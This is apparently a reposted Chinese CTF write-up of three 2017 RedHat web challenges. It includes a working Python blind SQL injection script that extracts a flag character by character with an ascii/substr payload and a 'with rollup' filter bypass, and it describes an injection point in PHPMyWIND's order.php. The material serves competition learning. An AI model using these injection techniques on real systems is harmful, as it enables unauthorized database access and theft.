首页 > 代码库 > 2017 redhat web writeup
2017 redhat web writeup
2017 RedHat Web writeup
1、thinkseeker
2、PHPMyWIND
3、后台
1、thinkseeker
2、PHPMyWIND
3、后台
2017 RedHat Web writeup
1、thinkseeker
这题考两个点
1、用with rollup过前面两个if
2、用盲注找到flag
关于第一点在实验吧有原题:http://www.shiyanbar.com/ctf/1940
过滤方法稍有不同,用操作符代替关键字即可。token使用变量覆盖就可以。
第二点就是infoid这个参数有盲注,跑脚本可以拿到flag。
这是脚本:
# -*- coding:utf-8 -*-
import requests
string = ‘‘
for i in range(1,63):
for j in range(32,127):
url="http://106.75.117.4:3083/?token=21232f297a57a5a743894a0e4a801fc3&infoid=1%0a%26%26%0aascii(substr((select%0agroup_concat(flag)%0afrom%0aflag)from({})for(1)))={}&userid=1%0a||%0a1%0agroup%0aby%0apassword%0awith%0arollup%0alimit%0a1%0aoffset%0a1&password=".format(i,j)
s=requests.get(url=url)
content=s.content
print i,j
# 判断
if "error sql!" not in content:
string+=chr(j)
break
print string
最后答案:
还是SQL注入做的少了,很多语句都不会写了。
2、PHPMyWIND
这题漏洞太多了,随便一扫出了3个xss,我就执着的认为就是XSS的题目,一度以为是自己的XSS平台出问题了,其实就是order.php下面有个注入,参考文章http://0day5.com/archives/1442/
注意设置一下cookie防止跳转
解开md5之后登陆管理员,找到这个
访问拿到flag
3、后台
脑洞题,密码就是日期20170506
其实根目录下还有一个flag.php,我一开始以为是要读这个文件,,
2017 redhat web writeup
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。